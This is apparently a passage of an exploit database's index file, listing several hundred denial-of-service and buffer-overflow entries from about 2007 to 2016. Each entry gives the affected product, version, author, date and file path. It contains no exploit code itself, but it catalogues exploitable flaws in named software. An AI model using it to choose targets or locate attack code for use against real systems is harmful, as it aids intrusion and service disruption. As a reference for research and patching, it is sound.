+30187,exploits/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 - URL Protocol Format String",2007-06-12,"Nir Rachmel",dos,multiple, +30188,exploits/windows/dos/30188.txt,"Apple Safari - Feed URI Denial of Service",2007-05-13,"Moshe Ben-Abu",dos,windows, +29692,exploits/php/dos/29692.txt,"PHP 3/4/5 - ZendEngine Variable Destruction Remote Denial of Service",2007-03-01,"Stefan Esser",dos,php, +29693,exploits/php/dos/29693.txt,"PHP 4/5 - Executor Deep Recursion Remote Denial of Service",2007-03-01,"Maksymilian Arciemowicz",dos,php, +29707,exploits/windows/dos/29707.txt,"JPEGView 1.0.29 - Crash (PoC)",2013-11-19,"Debasish Mandal",dos,windows, +29713,exploits/linux/dos/29713.html,"KDE Konqueror 3.5 - JavaScript IFrame Denial of Service",2007-03-05,mark,dos,linux, +29716,exploits/linux/dos/29716.txt,"Silc Server 1.0.2 - New Channel Remote Denial of Service",2007-03-06,"Frank Benkstein",dos,linux, +29717,exploits/linux/dos/29717.txt,"radscan conquest 8.2 - Multiple Vulnerabilities",2007-03-07,"Luigi Auriemma",dos,linux, +29720,exploits/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 - Document.Cookie Path Argument Denial of Service",2007-03-08,"Nicolas DEROUET",dos,linux, +29721,exploits/windows/dos/29721.pl,"FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",dos,windows, +29723,exploits/linux/dos/29723.txt,"Mozilla Firefox 2.0.0.2 - '.GIF' Handling Denial of Service",2007-03-09,Samuel,dos,linux, +29724,exploits/linux/dos/29724.txt,"MySQL 5.0.x - Single Row SubSelect Remote Denial of Service",2007-03-09,S.Streichsbier,dos,linux, +29738,exploits/windows/dos/29738.txt,"Microsoft Windows XP/2000 - 'WinMM.dll' / '.WAV' Remote Denial of Service",2007-03-13,"Michal Majchrowicz",dos,windows, +29740,exploits/windows/dos/29740.txt,"MiniGZip - Controls File_Compress Buffer Overflow",2007-03-14,starcadi,dos,windows, +29743,exploits/windows/dos/29743.txt,"Symantec 'SYMTDI.SYS' Device Driver - Local Denial of Service",2007-03-15,"David Matousek",dos,windows, +29767,exploits/hardware/dos/29767.txt,"ZYXEL Router 3.40 Zynos - SMB Data Handling Denial of Service",2007-03-20,"Joxean Koret",dos,hardware, +29781,exploits/linux/dos/29781.c,"Linux Kernel 2.6.x - IPv6_SockGlue.c Null Pointer Dereference Denial of Service",2007-03-26,"Joey Mengele",dos,linux, +29787,exploits/windows/dos/29787.py,"HP JetDirect FTP Print Server - RERT Command Denial of Service",2007-01-18,Handrix,dos,windows, +30110,exploits/linux/dos/30110.c,"Bochs 2.3 - Buffer Overflow / Denial of Service",2007-05-31,"Tavis Ormandy",dos,linux, +30139,exploits/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 - Outpost_IPC_HDR Local Denial of Service",2007-06-04,"Matousec Transparent security",dos,multiple, +30160,exploits/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ '.ICO' File Remote Denial of Service",2007-06-06,"Dennis Rand",dos,windows, +30163,exploits/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow",2007-06-08,"Dennis Rand",dos,multiple, +30167,exploits/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x - Web Interface Remote Denial of Service",2007-06-08,nnposter,dos,hardware, +29800,exploits/windows/dos/29800.py,"Microsoft Internet Explorer 7 - HTML Denial of Service",2007-03-28,shinnai,dos,windows, +29803,exploits/windows/dos/29803.pl,"Static HTTP Server 1.0 - Denial of Service",2013-11-25,GalaxyAndroid,dos,windows, +29809,exploits/linux/dos/29809.txt,"PulseAudio 0.9.5 - 'Assert()' Remote Denial of Service",2007-04-02,"Luigi Auriemma",dos,linux, +29810,exploits/windows/dos/29810.c,"Symantec (Multiple Products) - 'SPBBCDrv' Driver Local Denial of Service",2007-04-01,"David Matousek",dos,windows, +29813,exploits/windows/dos/29813.py,"Microsoft Windows Vista - ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",dos,windows, +29816,exploits/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",dos,windows, +29818,exploits/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple '.BMP' Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",dos,windows, +29819,exploits/windows/dos/29819.c,"IrfanView 3.99 - Multiple .BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",dos,windows, +29823,exploits/php/dos/29823.c,"PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow",2007-04-07,"Ivan Fratric",dos,php, +29826,exploits/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service",2007-04-09,"Jean Delvare",dos,linux, +29937,exploits/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 - Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",dos,windows, +29850,exploits/windows/dos/29850.txt,"eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities",2007-04-12,"Leon Juranic",dos,windows, +29860,exploits/windows/dos/29860.c,"ZoneAlarm 6.1.744.001/6.5.737.000 - Vsdatant.SYS Driver Local Denial of Service",2007-04-15,"Matousec Transparent security",dos,windows, +29867,exploits/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",dos,windows, +29875,exploits/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service",2007-04-21,"Levent Kayan",dos,multiple, +29896,exploits/windows/dos/29896.c,"Cdelia Software ImageProcessing - '.BMP' File Denial of Service",2007-04-24,Dr.Ninux,dos,windows, +29900,exploits/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (1)",2007-03-21,"Barrie Dempster",dos,multiple, +29901,exploits/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (2)",2007-03-21,"Barrie Dempster",dos,multiple, +29916,exploits/linux/dos/29916.c,"Linux Kernel 2.6.x - NETLINK_FIB_LOOKUP Local Denial of Service",2007-04-26,"Alexey Kuznetsov",dos,linux, +29919,exploits/hardware/dos/29919.py,"TP-Link TL-WR740N / TL-WR740ND 150M Wireless Lite N Router - HTTP Denial of Service",2013-11-30,"Dino Causevic",dos,hardware, +29920,exploits/linux/dos/29920.py,"Uptime Agent 5.0.1 - Stack Overflow",2013-11-30,"Denis Andzakovic",dos,linux, +29926,exploits/windows/dos/29926.pl,"Audacious Player 3.4.2/3.4.1 - '.mp3' Crash (PoC)",2013-11-30,"Akin Tosunlar",dos,windows, +29934,exploits/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 - '.zip' Crash (PoC)",2013-11-30,KAI,dos,windows, +29939,exploits/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 - XRender Extension Divide by Zero Denial of Service",2007-05-01,"Derek Abdine",dos,linux, +29940,exploits/windows/dos/29940.html,"Mozilla Firefox 2.0.0.3 - Href Denial of Service",2007-05-01,"Carl Hardwick",dos,windows, +29942,exploits/windows/dos/29942.c,"Atomix MP3 - '.MP3' File Buffer Overflow",2007-05-02,preth00nker,dos,windows, +29943,exploits/windows/dos/29943.pl,"Progress WebSpeed 3.0/3.1 - Denial of Service",2007-05-02,"Eelko Neven",dos,windows, +29949,exploits/windows/dos/29949.c,"Zoo 2.10 - .ZOO Compression Algorithm Remote Denial of Service",2007-05-04,Jean-Sébastien,dos,windows, +30080,exploits/linux/dos/30080.c,"Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service",2007-05-24,"Bart Oldeman",dos,linux, +30091,exploits/linux/dos/30091.py,"OpenOffice 2.2 Writer Component - Remote Denial of Service",2007-05-28,shinnai,dos,linux, +30104,exploits/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - 'FSMSH.dll' Remote Denial of Service",2007-05-30,"David Maciejak",dos,windows, +30193,exploits/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows - 'Corefoundation.dll' Denial of Service",2007-06-16,Lostmon,dos,windows, +30194,exploits/windows/dos/30194.txt,"Apple Safari 3 for Windows - 'Document.Location' Denial of Service",2007-06-16,azizov,dos,windows, +30224,exploits/windows/dos/30224.py,"Ingress Database Server 2.6 - Multiple Remote Vulnerabilities",2007-06-21,anonymous,dos,windows, +30233,exploits/windows/dos/30233.pl,"LiteWEB Web Server 2.7 - Invalid Page Remote Denial of Service",2007-06-25,Prili,dos,windows, +30251,exploits/linux/dos/30251.c,"GD Graphics Library 2.0.34 - 'libgd' gdImageCreateXbm Function Unspecified Denial of Service",2007-06-26,anonymous,dos,linux, +30252,exploits/windows/dos/30252.py,"Conti FTP Server 1.0 - Large String Denial of Service",2007-06-27,35c666,dos,windows, +30255,exploits/windows/dos/30255.txt,"PC SOFT WinDEV 11 - '.WDP' File Parsing Stack Buffer Overflow",2007-06-28,"Jerome Athias",dos,windows, +40743,exploits/windows/dos/40743.html,"VBScript 5.8.7600.16385/5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read",2016-11-09,Skylined,dos,windows, +30308,exploits/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - Integer Division by Zero Denial of Service",2013-12-15,sajith,dos,windows, +30314,exploits/windows/dos/30314.txt,"Yahoo! Messenger 8.1 - Address Book Remote Buffer Overflow",2007-07-16,"Rajesh Sethumadhavan",dos,windows, +30791,exploits/multiple/dos/30791.txt,"I Hear U 0.5.6 - Multiple Remote Denial of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",dos,multiple, +30395,exploits/php/dos/30395.txt,"PHP - 'openssl_x509_parse()' Memory Corruption",2013-12-17,"Stefan Esser",dos,php, +30397,exploits/windows/dos/30397.txt,"Microsoft Windows Kernel - 'win32k.sys' Integer Overflow (MS13-101)",2013-12-17,"Core Security",dos,windows, +30401,exploits/php/dos/30401.php,"T1lib - intT1_Env_GetCompletePath Buffer Overflow",2007-07-26,r0ut3r,dos,php, +30413,exploits/windows/dos/30413.py,"PotPlayer 1.5.40688 - '.avi' File Handling Memory Corruption",2013-12-20,ariarat,dos,windows, +31464,exploits/windows/dos/31464.pl,"Surgemail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow",2008-03-21,"Leon Juranic",dos,windows, +30414,exploits/windows/dos/30414.py,"GOM Player 2.2.56.5158 - '.avi' File Handling Memory Corruption",2013-12-20,ariarat,dos,windows, +30422,exploits/windows/dos/30422.py,"Easy Karaokay Player 3.3.31 - '.wav' Integer Division by Zero",2013-12-22,"Osanda Malith",dos,windows, +30430,exploits/linux/dos/30430.txt,"Fail2ban 0.8 - Remote Denial of Service",2007-07-28,"Daniel B. Cid",dos,linux, +30444,exploits/linux/dos/30444.txt,"KDE Konqueror 3.5.7 - Assert Denial of Service",2007-03-05,"Thomas Waldegger",dos,linux, +30455,exploits/windows/dos/30455.txt,"Microsoft Internet Explorer 6 - Position:Relative Denial of Service",2007-08-07,Hamachiya2,dos,windows, +30462,exploits/windows/dos/30462.py,"Microsoft Windows Media Player 11 - AU Divide-by-Zero Denial of Service",2007-08-08,"A.Sawan & nophie",dos,windows, +30494,exploits/windows/dos/30494.html,"Microsoft Internet Explorer 5.0.1 - Vector Markup Language 'VGX.dll' Remote Buffer Overflow",2007-08-14,"Ben Nagy & Derek Soeder",dos,windows, +30497,exploits/multiple/dos/30497.c,"Zoidcom 0.6.x - Malformed Packet Denial of Service",2007-08-14,"Luigi Auriemma",dos,multiple, +30498,exploits/multiple/dos/30498.txt,"Live For Speed S1/S2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",dos,multiple, +30500,exploits/windows/dos/30500.txt,"Yahoo! Messenger 8.1 - 'KDU_V32M.DLL' Remote Denial of Service",2007-08-15,team509,dos,windows, +30506,exploits/hardware/dos/30506.txt,"Cisco IOS 12.3 - Show IP BGP Regexp Remote Denial of Service",2007-08-17,anonymous,dos,hardware, +30512,exploits/windows/dos/30512.txt,"Total Commander FileInfo 2.09 Plugin - Multiple PE File Denial of Service Vulnerabilities",2007-07-20,"Gynvael Coldwind",dos,windows, +30513,exploits/multiple/dos/30513.txt,"Epic Games Unreal Engine Logging Function - Remote Denial of Service",2007-08-20,"Luigi Auriemma",dos,multiple, +30517,exploits/hardware/dos/30517.pl,"Grandstream GXV-3000 Phone - Remote Denial of Service",2007-08-22,MADYNES,dos,hardware, +30519,exploits/multiple/dos/30519.txt,"Asura Engine Challenge B Query - Remote Stack Buffer Overflow",2007-08-22,"Luigi Auriemma",dos,multiple, +30524,exploits/multiple/dos/30524.txt,"Soldat 1.4.2 - Multiple Remote Denial of Service Vulnerabilities",2007-08-23,"Luigi Auriemma",dos,multiple, +30526,exploits/multiple/dos/30526.txt,"Vavoom 1.24 - sv_main.cpp Say Command Remote Format String",2007-08-24,"Luigi Auriemma",dos,multiple, +30527,exploits/multiple/dos/30527.txt,"Vavoom 1.24 - str.cpp VStr::Resize Function Crafted UDP Packet Remote Denial of Service",2007-08-24,"Luigi Auriemma",dos,multiple, +30528,exploits/multiple/dos/30528.txt,"Vavoom 1.24 - 'p_thinker.cpp VThinker::BroadcastPrintf' Multiple Remote Overflows",2007-08-24,"Luigi Auriemma",dos,multiple, +30529,exploits/multiple/dos/30529.txt,"Media Player Classic 6.4.9 - FLI File Remote Buffer Overflow",2007-08-24,wushi,dos,multiple, +30530,exploits/hardware/dos/30530.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service",2007-08-27,"Humberto J. Abdelnur",dos,hardware, +30538,exploits/hardware/dos/30538.pl,"Thomson SpeedTouch 2030 - SIP Empty Message Remote Denial of Service",2007-08-28,"Humberto J. Abdelnur",dos,hardware, +30540,exploits/multiple/dos/30540.txt,"Blizzard Entertainment StarCraft Brood War 1.15.1 - Minimap Preview Remote Denial of Service",2007-08-28,"Gynvael Coldwind",dos,multiple, +30542,exploits/linux/dos/30542.txt,"EnterpriseDB Advanced Server 8.2 - Uninitialized Pointer",2007-08-29,"Joxean Koret",dos,linux, +30544,exploits/windows/dos/30544.txt,"Yahoo! Messenger 8.1 - File Transfer Denial of Service",2007-08-29,SlicK,dos,windows, +30550,exploits/windows/dos/30550.php,"Ofilter Player 1.1 - '.wav' Integer Division by Zero",2013-12-28,"Osanda Malith",dos,windows, +30566,exploits/multiple/dos/30566.txt,"Alien Arena 2007 6.10 - Multiple Remote Vulnerabilities",2007-09-05,"Luigi Auriemma",dos,multiple, +30574,exploits/multiple/dos/30574.txt,"CellFactor REvolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",dos,multiple, +30578,exploits/linux/dos/30578.txt,"MPlayer 1.0 - AVIHeader.C Heap Based Buffer Overflow",2007-09-12,"Code Audit Labs",dos,linux, +30579,exploits/linux/dos/30579.txt,"Media Player Classic 6.4.9 - Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",dos,linux, +32400,exploits/multiple/dos/32400.html,"Foxmail Email Client 6.5 - 'mailto' Buffer Overflow",2008-09-22,sebug,dos,multiple, +31913,exploits/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - '.m3u' Crash (PoC)",2014-02-26,"Gabor Seljan",dos,windows, +32705,exploits/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service",2014-04-06,"Interference Security",dos,windows, +30580,exploits/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 - Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",dos,linux, +30584,exploits/linux/dos/30584.py,"Boa 0.93.15 - Administrator Password Overwrite Authentication Bypass",2007-09-14,"Luca Carettoni",dos,linux, +30590,exploits/windows/dos/30590.txt,"WinImage 8.0/8.10 - '.IMG' File BPB_BytsPerSec Field Denial of Service",2007-09-17,j00ru//vx,dos,windows, +30592,exploits/multiple/dos/30592.py,"Python 2.2 ImageOP Module - Multiple Integer Overflow Vulnerabilities",2007-09-17,"Slythers Bro",dos,multiple, +30593,exploits/windows/dos/30593.txt,"Microsoft MFC Library - CFileFind::FindFile Buffer Overflow",2007-09-14,"Jonathan Sarba",dos,windows, +30619,exploits/windows/dos/30619.txt,"Microsoft Windows Explorer - '.png' Image Local Denial of Service",2007-07-26,"Xavier Roche",dos,windows, +30628,exploits/windows/dos/30628.txt,"FSD 2.052/3.000 - servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow",2007-10-01,"Luigi Auriemma",dos,windows, +30644,exploits/multiple/dos/30644.txt,"Dawn of Time 1.69 MUD Server - Multiple Format String Vulnerabilities",2007-10-05,"Luigi Auriemma",dos,multiple, +30646,exploits/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 - Location Header Remote Buffer Overflow",2007-07-16,"Nobuhiro Ban",dos,linux, +30648,exploits/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow",2007-10-08,Erik,dos,linux, +30797,exploits/windows/dos/30797.html,"Aurigma Image Uploader 4.x - ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",dos,windows, +30672,exploits/windows/dos/30672.txt,"Live for Speed - Skin Name Buffer Overflow",2007-10-13,"Luigi Auriemma",dos,windows, +30679,exploits/hardware/dos/30679.pl,"Nortel Networks - Multiple UNIStim VoIP Products Remote Eavesdrop Vulnerabilities",2007-10-18,"Daniel Stirnimann",dos,hardware, +30805,exploits/windows/dos/30805.html,"RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",dos,windows, +30688,exploits/hardware/dos/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - Reboot (Denial of Service)",2014-01-04,nicx0,dos,hardware, +30702,exploits/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 - Malformed XBL Constructor Remote Denial of Service",2007-10-22,"Soroush Dalili",dos,multiple, +30713,exploits/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial of Service",2007-10-26,"The Hacker Webzine",dos,multiple, +30714,exploits/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 - IMAP4 LSUB Buffer Overflow",2007-10-27,"Manuel Santamarina Suarez",dos,unix, +30724,exploits/linux/dos/30724.txt,"Perdition 1.17 - IMAPD __STR_VWRITE Remote Format String",2007-10-31,"Bernhard Mueller",dos,linux, +30744,exploits/linux/dos/30744.txt,"MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial of Service",2007-11-05,"Joe Gallo",dos,linux, +30749,exploits/windows/dos/30749.html,"Microsoft Office 2003 - Web Component Memory Access Violation Denial of Service",2007-11-12,"Elazar Broad",dos,windows, +30753,exploits/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - 'index.php' Denial of Service",2007-11-12,L4teral,dos,php, +30756,exploits/windows/dos/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service",2007-11-12,"Elazar Broad",dos,windows, +30760,exploits/php/dos/30760.txt,"PHP 5.2.5 - Multiple GetText functions Denial of Service Vulnerabilities",2007-11-13,"laurent gaffie",dos,php, +30761,exploits/windows/dos/30761.html,"WebEx GPCContainer - Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",dos,windows, +30763,exploits/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",dos,linux, +40602,exploits/windows/dos/40602.html,"Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",dos,windows, +30766,exploits/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - 'safer_name_suffix' Remote Denial of Service",2007-11-14,"Dmitry V. Levin",dos,linux, +30767,exploits/windows/dos/30767.html,"Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow",2007-06-25,"Azizov E",dos,windows, +40604,exploits/windows/dos/40604.html,"Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",dos,windows, +30776,exploits/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial of Service",2007-11-19,"Luigi Auriemma",dos,linux, +30779,exploits/multiple/dos/30779.txt,"Rigs of Rods 0.33d - 'Vehicle Name' Buffer Overflow",2007-11-19,"Luigi Auriemma",dos,multiple, +30974,exploits/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service",2008-01-02,greyvoip,dos,multiple, +30812,exploits/windows/dos/30812.html,"RealMedia RealPlayer 10.5/11 - 'ierpplug.dll' PlayerProperty ActiveX Control Buffer Overflow",2007-11-26,"Elazar Broad",dos,windows, +30814,exploits/multiple/dos/30814.txt,"Skype 3.6.216 - Voicemail URI Handler Remote Denial of Service",2007-11-26,"Critical Security",dos,multiple, +30825,exploits/windows/dos/30825.html,"Microsoft Windows Media Digital Rights Management - ActiveX Control Buffer Overflow",2006-10-09,"Joxean Koret",dos,windows, +30832,exploits/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper - Class ActiveX Control Remote Buffer Overflow Denial of Service",2007-11-29,"Elazar Broad",dos,windows, +30837,exploits/linux/dos/30837.txt,"QEMU 0.9 - Translation Block Local Denial of Service",2007-11-30,TeLeMan,dos,linux, +30840,exploits/windows/dos/30840.txt,"SonicWALL Global VPN Client 4.0.782 - Remote Format String",2007-12-04,"SEC Consult",dos,windows, +30856,exploits/multiple/dos/30856.txt,"Easy File Sharing Web Server 1.3x/4.5 - Directory Traversal / Multiple Information Disclosure Vulnerabilities",2007-12-07,"Luigi Auriemma",dos,multiple, +30885,exploits/multiple/dos/30885.txt,"QK SMTP Server - Malformed Commands Multiple Remote Denial of Service Vulnerabilities",2007-12-13,"Juan Pablo Lopez Yacubian",dos,multiple, +30894,exploits/linux/dos/30894.txt,"PeerCast 0.12 - HandshakeHTTP Multiple Buffer Overflow Vulnerabilities",2007-12-17,"Luigi Auriemma",dos,linux, +30895,exploits/linux/dos/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 - DNS Response Remote Denial of Service",2007-12-17,beSTORM,dos,linux, +30896,exploits/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 - Remote Denial of Service",2007-12-17,"Chris Castaldo",dos,multiple, +30898,exploits/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP - 'asn1_get_string()' Remote Buffer Overflow",2007-11-06,wei_wang,dos,linux, +30902,exploits/linux/dos/30902.c,"Linux Kernel 2.6.22 - IPv6 Hop-By-Hop Header Remote Denial of Service",2007-12-19,"Clemens Kurtenbach",dos,linux, +30903,exploits/multiple/dos/30903.c,"id3lib ID3 Tags - Buffer Overflow",2007-12-19,"Luigi Auriemma",dos,multiple, +30906,exploits/multiple/dos/30906.c,"ProWizard 4 PC 1.62 - Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",dos,multiple, +30922,exploits/multiple/dos/30922.c,"WinUAE 1.4.4 - 'zfile.c' Stack Based Buffer Overflow",2007-12-21,"Luigi Auriemma",dos,multiple, +30956,exploits/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow",2007-12-28,"Luigi Auriemma",dos,linux, +30934,exploits/windows/dos/30934.txt,"Total Player 3.0 - '.m3u' File Denial of Service",2007-12-25,"David G.M.",dos,windows, +30936,exploits/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",dos,windows, +30942,exploits/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",dos,linux, +30943,exploits/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",dos,multiple, +30985,exploits/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow",2007-12-30,"Devon Miller",dos,linux, +30989,exploits/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service",2008-01-04,"Luigi Auriemma",dos,multiple, +30990,exploits/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 - Denial of Service",2008-01-04,"Luigi Auriemma",dos,multiple, +30991,exploits/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 - NULL-Pointer Dereference Denial of Service",2008-01-04,"Luigi Auriemma",dos,multiple, +31002,exploits/linux/dos/31002.txt,"Xine-Lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow",2008-01-09,"Luigi Auriemma",dos,linux, +31014,exploits/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,dos,windows,53 +31018,exploits/linux/dos/31018.txt,"GStreamer 0.10.15 - Multiple Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",dos,linux, +31021,exploits/osx/dos/31021.html,"Apple Safari 2.0.4 - KHTML WebKit Remote Denial of Service",2008-01-12,"David Barroso",dos,osx, +31054,exploits/linux/dos/31054.txt,"SDL_image 1.2.6 - Invalid '.GIF' File LWZ Minimum Code Size Remote Buffer Overflow",2008-01-23,"Gynvael Coldwind",dos,linux, +31057,exploits/ios/dos/31057.html,"Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,dos,ios, +31100,exploits/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 - Remote Authentication Buffer Overflow",2008-02-04,L4teral,dos,multiple, +31102,exploits/hardware/dos/31102.c,"MikroTik RouterOS 3.0 - SNMP SET Denial of Service",2008-02-04,ShadOS,dos,hardware, +31105,exploits/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Remote Buffer Overflow",2008-02-04,j0rgan,dos,windows, +31114,exploits/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities",2008-02-06,"Paul Craig",dos,windows, +31122,exploits/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",dos,windows, +31128,exploits/multiple/dos/31128.txt,"IEA Software (Multiple Products) - POST Denial of Service",2008-02-08,"Luigi Auriemma",dos,multiple, +31136,exploits/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String / Denial of Service Vulnerabilities",2008-02-11,"Luigi Auriemma",dos,multiple, +31138,exploits/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",dos,windows, +31139,exploits/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - 'LstNPS' Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",dos,windows, +31148,exploits/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",dos,multiple, +31150,exploits/multiple/dos/31150.txt,"RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow",2008-02-11,"Luigi Auriemma",dos,multiple, +31306,exploits/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service",2008-02-26,sipherr,dos,hardware, +31307,exploits/android/dos/31307.py,"Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow",2008-03-04,"Alfredo Ortega",dos,android, +31168,exploits/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - '.EBP' Project File Buffer Overflow",2014-01-24,LiquidWorm,dos,windows, +31176,exploits/windows/dos/31176.html,"MW6 Technologies Aztec - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",dos,windows, +31177,exploits/windows/dos/31177.html,"MW6 Technologies Datamatrix - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",dos,windows, +31178,exploits/windows/dos/31178.html,"MW6 Technologies MaxiCode - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",dos,windows, +31305,exploits/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)",2014-01-31,"Kees Cook",dos,linux, +31271,exploits/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",dos,multiple, +31203,exploits/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",dos,multiple, +31205,exploits/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,dos,windows, +31218,exploits/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",dos,linux, +31220,exploits/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,dos,linux, +31222,exploits/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,dos,windows, +31223,exploits/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - 